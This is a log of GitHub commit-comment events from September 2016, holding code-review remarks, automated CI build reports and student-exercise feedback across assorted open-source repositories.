{"id":"4592893186","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19105176,"position":null,"line":null,"path":null,"commit_id":"b3aaddd9f24b80e3fd2bd9eb1bfa8edc602476a7","created_at":"2016-09-20T22:25:35Z","updated_at":"2016-09-20T22:25:35Z","body":"\nBuild report #161473176 for sha b3aaddd9f24b80e3fd2bd9eb1bfa8edc602476a7:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.08%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2829%20/%209913%20%2828.54%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-24.06%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/master/)\n      "}},"created_at":"2016-09-20T22:25:35Z"}
{"id":"4592897567","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105189,"position":4,"line":7,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:26:40Z","updated_at":"2016-09-20T22:26:40Z","body":"Why not move it to FaultInjector.h header file?"}},"created_at":"2016-09-20T22:26:40Z"}
{"id":"4592900456","type":"CommitCommentEvent","actor":{"login":"lsetiawan"},"repo":{"name":"miguelcleon/ODM2-Admin"},"payload":{"comment":{"id":19105194,"position":194,"line":858,"path":"ODM2CZOData/forms.py","commit_id":"2638445dc6af481a83e28ef2b96e9d6ac0792bd4","created_at":"2016-09-20T22:27:20Z","updated_at":"2016-09-20T22:27:20Z","body":"@miguelcleon Found a fix for this, I've made a [PR](https://github.com/miguelcleon/ODM2-Admin/pull/50)"}},"created_at":"2016-09-20T22:27:20Z"}
{"id":"4592900608","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105196,"position":14,"line":87,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:27:23Z","updated_at":"2016-09-20T22:27:23Z","body":"Remove commented code."}},"created_at":"2016-09-20T22:27:23Z"}
{"id":"4592902604","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105200,"position":24,"line":97,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:27:48Z","updated_at":"2016-09-20T22:27:48Z","body":"Remove commented code."}},"created_at":"2016-09-20T22:27:48Z"}
{"id":"4592902865","type":"CommitCommentEvent","actor":{"login":"mattfordham"},"repo":{"name":"WikiEducationFoundation/WikiEduDashboard"},"payload":{"comment":{"id":19105217,"position":5,"line":12,"path":"app/assets/javascripts/components/students/training_status.jsx","commit_id":"5917237b9d7021bda2fd4c0072a50b93be982431","created_at":"2016-09-20T22:27:51Z","updated_at":"2016-09-20T22:27:51Z","body":"@ragesoss Returning `null` should fix the styling issue.\r\n\r\nhttps://facebook.github.io/react/blog/2014/07/17/react-v0.11.html#rendering-to-null"}},"created_at":"2016-09-20T22:27:51Z"}
{"id":"4592903274","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105219,"position":38,"line":128,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:27:57Z","updated_at":"2016-09-20T22:27:57Z","body":"Remove commented code."}},"created_at":"2016-09-20T22:27:57Z"}
{"id":"4592904040","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105222,"position":43,"line":132,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:28:07Z","updated_at":"2016-09-20T22:28:07Z","body":"Remove commented code."}},"created_at":"2016-09-20T22:28:07Z"}
{"id":"4592904071","type":"CommitCommentEvent","actor":{"login":"Arnavion"},"repo":{"name":"jarek-foksa/path-data-polyfill.js"},"payload":{"comment":{"id":19105223,"position":null,"line":null,"path":null,"commit_id":"db90789cb4df447be0de1b42061e27f11684928a","created_at":"2016-09-20T22:28:07Z","updated_at":"2016-09-20T22:28:07Z","body":"Why convert number to string then back to number, instead of just using the original number?"}},"created_at":"2016-09-20T22:28:07Z"}
{"id":"4592904840","type":"CommitCommentEvent","actor":{"login":"lukebakken"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19105226,"position":84,"line":106,"path":"src/riak_kv_pb_index.erl","commit_id":"ccb019fdc02ad545a9914adc391c56d423550630","created_at":"2016-09-20T22:28:17Z","updated_at":"2016-09-20T22:28:17Z","body":"@lehoff - this change broke PB compatibility. `stream` is an optional field, and if not sent in a protobuf message, the value is set to `undefined`. This results in a case clause error being thrown here.\r\n\r\nThe other changes between `2.1` and `develop-2.2` need to be reviewed so that any `optional` field in a PB message is not assumed to be not-`undefined`"}},"created_at":"2016-09-20T22:28:17Z"}
{"id":"4592905319","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105227,"position":53,"line":335,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:28:24Z","updated_at":"2016-09-20T22:28:24Z","body":"Remove commented code."}},"created_at":"2016-09-20T22:28:24Z"}
{"id":"4592905803","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105228,"position":63,"line":506,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:28:32Z","updated_at":"2016-09-20T22:28:32Z","body":"Remove commented code."}},"created_at":"2016-09-20T22:28:32Z"}
{"id":"4592906427","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105229,"position":71,"line":513,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:28:40Z","updated_at":"2016-09-20T22:28:40Z","body":"Remove commented code."}},"created_at":"2016-09-20T22:28:40Z"}
{"id":"4592907803","type":"CommitCommentEvent","actor":{"login":"apastore"},"repo":{"name":"chapmanb/bcbio-nextgen"},"payload":{"comment":{"id":19105231,"position":null,"line":null,"path":null,"commit_id":"510367397c12949822dd04be5e2a6f992a4bcb9f","created_at":"2016-09-20T22:29:00Z","updated_at":"2016-09-20T22:29:00Z","body":"Hi @rorky, just one.question let's say I obtain a set of Bams form a collaborator. Does it mean that I will not obtain the sailfish count at all? There is a parameter to configure bcbio to keep on quantifying bams? \r\nThanks! "}},"created_at":"2016-09-20T22:29:00Z"}
{"id":"4592909213","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105235,"position":89,"line":546,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:29:20Z","updated_at":"2016-09-20T22:29:20Z","body":"Remove all commented codes."}},"created_at":"2016-09-20T22:29:20Z"}
{"id":"4592911673","type":"CommitCommentEvent","actor":{"login":"ragesoss"},"repo":{"name":"WikiEducationFoundation/WikiEduDashboard"},"payload":{"comment":{"id":19105241,"position":5,"line":12,"path":"app/assets/javascripts/components/students/training_status.jsx","commit_id":"5917237b9d7021bda2fd4c0072a50b93be982431","created_at":"2016-09-20T22:29:57Z","updated_at":"2016-09-20T22:29:57Z","body":"Nope."}},"created_at":"2016-09-20T22:29:57Z"}
{"id":"4592912050","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"negroreyes/Coderhouse"},"payload":{"comment":{"id":19105242,"position":null,"line":null,"path":null,"commit_id":"344c61a8a8742ecf459e5e4f778174745a0409c4","created_at":"2016-09-20T22:30:02Z","updated_at":"2016-09-20T22:30:02Z","body":"Te faltó usar nav, article y section, pero el documento está bien en general."}},"created_at":"2016-09-20T22:30:02Z"}
{"id":"4592912206","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_vendor_aosp"},"payload":{"comment":{"id":19105243,"position":null,"line":null,"path":null,"commit_id":"cda108e58a231a07b1cef2dfb8eda403238e1402","created_at":"2016-09-20T22:30:04Z","updated_at":"2016-09-20T22:30:04Z","body":"There' s no reason to rename the zip as it's already handled here: https://github.com/AOSP-JF-MM/platform_vendor_aosp/blob/aosp-7.0-test/config/version.mk\r\nand here: https://github.com/AOSP-JF-MM/platform_build/commit/4fc351bd22f2e04084f035fd2d17225c8b4645db\r\nusing bacon.\r\nand.. mka may be used instead of make: https://github.com/AOSP-JF-MM/platform_build/commit/37cab9648b71f914c8414fb9512f88a13af58be0 "}},"created_at":"2016-09-20T22:30:04Z"}
{"id":"4592913604","type":"CommitCommentEvent","actor":{"login":"axl89"},"repo":{"name":"pandorafms/pandorafms"},"payload":{"comment":{"id":19105247,"position":null,"line":null,"path":null,"commit_id":"ec352d16e17f1e42cb8aabb5f0163951be1bfb5e","created_at":"2016-09-20T22:30:22Z","updated_at":"2016-09-20T22:30:22Z","body":"See the [build](https://travis-ci.org/axl89/pandorafms/builds/161473960) of my forked repo. It somehow failed, but it definitively executed the tests inside the container.\r\n\r\nI throw two clues:\r\n\r\n1. Maybe it's something related to the display being creating with every test object? Maybe it'd be better in run_console_tests.py.\r\n\r\n2. Remember that we used python 2.7 (rather than the 2.6 that CentOS brings by default). Maybe it'd help to install it."}},"created_at":"2016-09-20T22:30:22Z"}
{"id":"4592915558","type":"CommitCommentEvent","actor":{"login":"gustvao"},"repo":{"name":"stavarengo/php-sigep"},"payload":{"comment":{"id":19105249,"position":null,"line":null,"path":null,"commit_id":"361ef8c12878efc45b964d54cee3f1c79a349890","created_at":"2016-09-20T22:30:49Z","updated_at":"2016-09-20T22:30:49Z","body":"isso é feature not a bug... se der merge vai quebrar o código de todo mundo que já usa desse jeito quqando der update :)"}},"created_at":"2016-09-20T22:30:49Z"}
{"id":"4592921203","type":"CommitCommentEvent","actor":{"login":"aethelwulffe"},"repo":{"name":"LibreEHR/LibreEHR"},"payload":{"comment":{"id":19105269,"position":null,"line":null,"path":null,"commit_id":"aedc780f7016113b96a6117d51c52b24eabf6f2e","created_at":"2016-09-20T22:32:07Z","updated_at":"2016-09-20T22:32:07Z","body":"Bump:\r\nI see that there are pnotes, calendar changes that I have had to do myself in here.  Some of this is very good stuff.  Other bits like the tabs menu is too stale.  What to do with this branch?"}},"created_at":"2016-09-20T22:32:07Z"}
{"id":"4592921206","type":"CommitCommentEvent","actor":{"login":"mattfordham"},"repo":{"name":"WikiEducationFoundation/WikiEduDashboard"},"payload":{"comment":{"id":19105270,"position":5,"line":12,"path":"app/assets/javascripts/components/students/training_status.jsx","commit_id":"5917237b9d7021bda2fd4c0072a50b93be982431","created_at":"2016-09-20T22:32:07Z","updated_at":"2016-09-20T22:32:07Z","body":"Hmm. k. I'll pull down and take a look ;)"}},"created_at":"2016-09-20T22:32:07Z"}
{"id":"4592921412","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105271,"position":15,"line":317,"path":"master/runtime/Corrupt.C","commit_id":"83a1b9eb601412fa85ebac451b61fd44dbbde3ad","created_at":"2016-09-20T22:32:10Z","updated_at":"2016-09-20T22:32:10Z","body":"Either remove those print statements or replace them with errs(). Refer LLVM Programming guide to learn more about errs()."}},"created_at":"2016-09-20T22:32:10Z"}
{"id":"4592923771","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105276,"position":5,"line":11,"path":"master/lib/MaskFaults.cpp","commit_id":"f4c5445a0f4e235d304fe5237ab06846bb5d3828","created_at":"2016-09-20T22:32:42Z","updated_at":"2016-09-20T22:32:42Z","body":"Move it header file?"}},"created_at":"2016-09-20T22:32:42Z"}
{"id":"4592926012","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105289,"position":16,"line":24,"path":"master/lib/MaskFaults.cpp","commit_id":"f4c5445a0f4e235d304fe5237ab06846bb5d3828","created_at":"2016-09-20T22:33:14Z","updated_at":"2016-09-20T22:33:14Z","body":"Remove all commented codes."}},"created_at":"2016-09-20T22:33:14Z"}
{"id":"4592929255","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"AGSolutions/ch-clase-1"},"payload":{"comment":{"id":19105304,"position":null,"line":null,"path":null,"commit_id":"d808ed1201320a459e1b363c6e28312877eeb67d","created_at":"2016-09-20T22:33:57Z","updated_at":"2016-09-20T22:33:57Z","body":"Estupendo trabajo! Te faltó el nav, pero está muy bien."}},"created_at":"2016-09-20T22:33:57Z"}
{"id":"4592930145","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19105309,"position":null,"line":null,"path":null,"commit_id":"f0ad4d118f63f5334be54fab1f77be147491ee5e","created_at":"2016-09-20T22:34:09Z","updated_at":"2016-09-20T22:34:09Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2365 of 2372 tests passed, 25 test warnings)\n\n * 32 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 7 tests had: Table big diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: RDD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T22:34:09Z"}
{"id":"4592932423","type":"CommitCommentEvent","actor":{"login":"clarkbw"},"repo":{"name":"devtools-html/debugger.html"},"payload":{"comment":{"id":19105313,"position":4,"line":11,"path":"docs/mochitests.md","commit_id":"463ae613ce26f65e39bae93d3e97bda1836914c7","created_at":"2016-09-20T22:34:42Z","updated_at":"2016-09-20T22:34:42Z","body":"Mercurial is still required!"}},"created_at":"2016-09-20T22:34:42Z"}
{"id":"4592932846","type":"CommitCommentEvent","actor":{"login":"gwiebe"},"repo":{"name":"gwiebe/Project-Numero-Uno"},"payload":{"comment":{"id":19105314,"position":24,"line":24,"path":"README.md","commit_id":"356931744da626ea51b24542cb345d6e2b9765d7","created_at":"2016-09-20T22:34:48Z","updated_at":"2016-09-20T22:34:48Z","body":"![image](https://cloud.githubusercontent.com/assets/21350373/18691301/85a9f016-7f58-11e6-8352-a62619b4af22.png)\r\n"}},"created_at":"2016-09-20T22:34:48Z"}
{"id":"4592935620","type":"CommitCommentEvent","actor":{"login":"Ga22be"},"repo":{"name":"initiumSrc/EITF05-webshop"},"payload":{"comment":{"id":19105334,"position":null,"line":null,"path":null,"commit_id":"bc06cb474e0789883834cfb5c8f9d235c019f213","created_at":"2016-09-20T22:35:28Z","updated_at":"2016-09-20T22:35:28Z","body":"Now contains bug where you can checkout cart with credentials for a different user."}},"created_at":"2016-09-20T22:35:28Z"}
{"id":"4592937186","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19105339,"position":null,"line":null,"path":null,"commit_id":"92bcfccfab5365bd1e42990896fb81ba0ef118de","created_at":"2016-09-20T22:35:53Z","updated_at":"2016-09-20T22:35:53Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: Tests Failed (2211 of 2478 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-92bcfccfab5365bd1e42990896fb81ba0ef118de-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-92bcfccfab5365bd1e42990896fb81ba0ef118de-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-89.23%25-red.svg)</a> \n"}},"created_at":"2016-09-20T22:35:53Z"}
{"id":"4592937767","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"negroreyes/Coderhouse"},"payload":{"comment":{"id":19105345,"position":null,"line":null,"path":null,"commit_id":"93fe7eebf26d623d99a4a01a6fcc58a58e961964","created_at":"2016-09-20T22:36:04Z","updated_at":"2016-09-20T22:36:04Z","body":"Está muy bien tu TP 2 !\r\n👍 "}},"created_at":"2016-09-20T22:36:04Z"}
{"id":"4592943119","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"indigovioleta/trabajos-practicos"},"payload":{"comment":{"id":19105357,"position":null,"line":null,"path":null,"commit_id":"b165b9bffc1cf6de464a65a8456c136125cc2c84","created_at":"2016-09-20T22:37:21Z","updated_at":"2016-09-20T22:37:21Z","body":"Esto va muy bien! 👍 "}},"created_at":"2016-09-20T22:37:21Z"}
{"id":"4592944182","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19105360,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-20T22:37:37Z","updated_at":"2016-09-20T22:37:37Z","body":"ASIHP-validation1 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1192 of 1192 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-20T22:37:37Z"}
{"id":"4592944644","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19105363,"position":null,"line":null,"path":null,"commit_id":"92ef15d81f341e6672aaac9949893e6b3344b38b","created_at":"2016-09-20T22:37:43Z","updated_at":"2016-09-20T22:37:43Z","body":"\nBuild report #161475643 for sha 92ef15d81f341e6672aaac9949893e6b3344b38b:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.08%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2820%20/%209910%20%2828.46%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-24.00%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/feature/unitests/)\n      "}},"created_at":"2016-09-20T22:37:43Z"}
{"id":"4592944813","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19105365,"position":null,"line":null,"path":null,"commit_id":"92ef15d81f341e6672aaac9949893e6b3344b38b","created_at":"2016-09-20T22:37:45Z","updated_at":"2016-09-20T22:37:45Z","body":"\nBuild report #161475648 for sha 92ef15d81f341e6672aaac9949893e6b3344b38b:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.08%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2820%20/%209910%20%2828.46%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-24.00%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/master/)\n      "}},"created_at":"2016-09-20T22:37:45Z"}
{"id":"4592944913","type":"CommitCommentEvent","actor":{"login":"AngelFQC"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19105366,"position":8,"line":3065,"path":"main/install/install.lib.php","commit_id":"0fd95c5b2f5ec6808ebf3367336dd7cf089c75f9","created_at":"2016-09-20T22:37:47Z","updated_at":"2016-09-20T22:37:47Z","body":"`while` or `foreach`?"}},"created_at":"2016-09-20T22:37:47Z"}
{"id":"4592944997","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19105367,"position":null,"line":null,"path":null,"commit_id":"f0ad4d118f63f5334be54fab1f77be147491ee5e","created_at":"2016-09-20T22:37:48Z","updated_at":"2016-09-20T22:37:48Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T22:37:48Z"}
{"id":"4592945547","type":"CommitCommentEvent","actor":{"login":"nathanhammond"},"repo":{"name":"sindresorhus/find-up"},"payload":{"comment":{"id":19105370,"position":null,"line":null,"path":null,"commit_id":"31cd65dd389aec2c77ccab14d4c97e07427cc299","created_at":"2016-09-20T22:37:56Z","updated_at":"2016-09-20T22:37:56Z","body":"Hey @sindresorhus! We love your work and use it in many different places inside of Ember CLI.\r\n\r\nHowever, Ember has committed to supporting the [Node.js LTS schedule](https://github.com/nodejs/LTS#lts-schedule) for the `HEAD` of our `master` branch(es). This means that we will will drop support for 0.10 on 2016-10-01 and 0.12 on 2016-12-31 per the Node.js Long-term Support Working Group's schedule.\r\n\r\nWe recognize that we don't have the privilege of setting that default for the entire Node.js ecosystem and have reserved the option to change that in the future if we find ourselves maintaining our own forks or legacy versions of the entire world. However, we would like to encourage as much of the Node.js ecosystem as possible to commit to following the Node.js LTS cadence: dropping support for older Node.js versions on the dates laid out. If we all drop support on the same day, this sends a clear message to the wider community that LTS means what it says 😉. By validating & throwing weight behind Node.js LTS, we can help to position Node.js a reliable, dependable tool for SMBs & enterprise alike, and contribute to improving the reputation of the ecosystem.\r\n\r\nIf you would be willing to consider this in the future (especially when it comes time to drop 4.X support) that would be valuable. In the mean time we will remain pinned on an older version of `find-up` for Ember CLI until January 1.\r\n\r\nMore information in our blog post.](http://emberjs.com/blog/2016/09/07/ember-node-lts-[support.html)"}},"created_at":"2016-09-20T22:37:56Z"}
{"id":"4592947887","type":"CommitCommentEvent","actor":{"login":"AngelFQC"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19105379,"position":8,"line":3065,"path":"main/install/install.lib.php","commit_id":"0fd95c5b2f5ec6808ebf3367336dd7cf089c75f9","created_at":"2016-09-20T22:38:27Z","updated_at":"2016-09-20T22:38:27Z","body":"`while` or `foreach`?"}},"created_at":"2016-09-20T22:38:27Z"}
{"id":"4592947936","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"efuentes85/CoderHouse"},"payload":{"comment":{"id":19105380,"position":null,"line":null,"path":null,"commit_id":"bcef54d4b83e107291e3baa8eb67d7e71a197588","created_at":"2016-09-20T22:38:27Z","updated_at":"2016-09-20T22:38:27Z","body":"Quedó bastante bien el formulario! 👍 "}},"created_at":"2016-09-20T22:38:27Z"}
{"id":"4592950414","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19105389,"position":null,"line":null,"path":null,"commit_id":"eaf7928ec389776610a1d9b38cac282e0fbc54a4","created_at":"2016-09-20T22:39:02Z","updated_at":"2016-09-20T22:39:02Z","body":"MakeWebKitWork (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-eaf7928ec389776610a1d9b38cac282e0fbc54a4-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-eaf7928ec389776610a1d9b38cac282e0fbc54a4-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T22:39:02Z"}
{"id":"4592952100","type":"CommitCommentEvent","actor":{"login":"MikeJel"},"repo":{"name":"MikeJel/phase-0-gps-1"},"payload":{"comment":{"id":19105400,"position":null,"line":null,"path":null,"commit_id":"4929a4a983148c766d994add319e40df8ec2c4ef","created_at":"2016-09-20T22:39:28Z","updated_at":"2016-09-20T22:39:28Z","body":"had an error of two different awesome files.. decided to add the code to both in terminal and then i pushed it. "}},"created_at":"2016-09-20T22:39:28Z"}
{"id":"4592955195","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"Cotettyta/c-h-clase-1"},"payload":{"comment":{"id":19105408,"position":null,"line":null,"path":null,"commit_id":"48788b447326a035567c72636baa3b976ea8527a","created_at":"2016-09-20T22:40:14Z","updated_at":"2016-09-20T22:40:14Z","body":"Muy bueno!\r\nNo muestra la foto porque pusiste mac.jpe y es mac.jpg \r\n👍 "}},"created_at":"2016-09-20T22:40:14Z"}
{"id":"4592960379","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19105417,"position":null,"line":null,"path":null,"commit_id":"eaf7928ec389776610a1d9b38cac282e0fbc54a4","created_at":"2016-09-20T22:41:30Z","updated_at":"2016-09-20T22:41:30Z","body":"MakeWebKitWork (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-eaf7928ec389776610a1d9b38cac282e0fbc54a4-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-eaf7928ec389776610a1d9b38cac282e0fbc54a4-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T22:41:30Z"}
{"id":"4592963409","type":"CommitCommentEvent","actor":{"login":"arnabd88"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105427,"position":null,"line":null,"path":null,"commit_id":"83a1b9eb601412fa85ebac451b61fd44dbbde3ad","created_at":"2016-09-20T22:42:13Z","updated_at":"2016-09-20T22:42:13Z","body":"Hi Vishal,\r\nI have removed comments on temp , and the print of fia."}},"created_at":"2016-09-20T22:42:13Z"}
{"id":"4592963652","type":"CommitCommentEvent","actor":{"login":"JimBobSquarePants"},"repo":{"name":"JimBobSquarePants/UmbracoFileSystemProviders.Azure"},"payload":{"comment":{"id":19105428,"position":5,"line":460,"path":"src/UmbracoFileSystemProviders.Azure.Installer/InstallerController.cs","commit_id":"a8c17ffa19fc8f756f3ccf9e4ee2fe68f7915dfa","created_at":"2016-09-20T22:42:15Z","updated_at":"2016-09-20T22:42:15Z","body":"Interesting. We should try to check whether upgrading affects this also. "}},"created_at":"2016-09-20T22:42:15Z"}
{"id":"4592963988","type":"CommitCommentEvent","actor":{"login":"AngelFQC"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19105430,"position":8,"line":3065,"path":"main/install/install.lib.php","commit_id":"0fd95c5b2f5ec6808ebf3367336dd7cf089c75f9","created_at":"2016-09-20T22:42:21Z","updated_at":"2016-09-20T22:42:21Z","body":"Fixed"}},"created_at":"2016-09-20T22:42:21Z"}
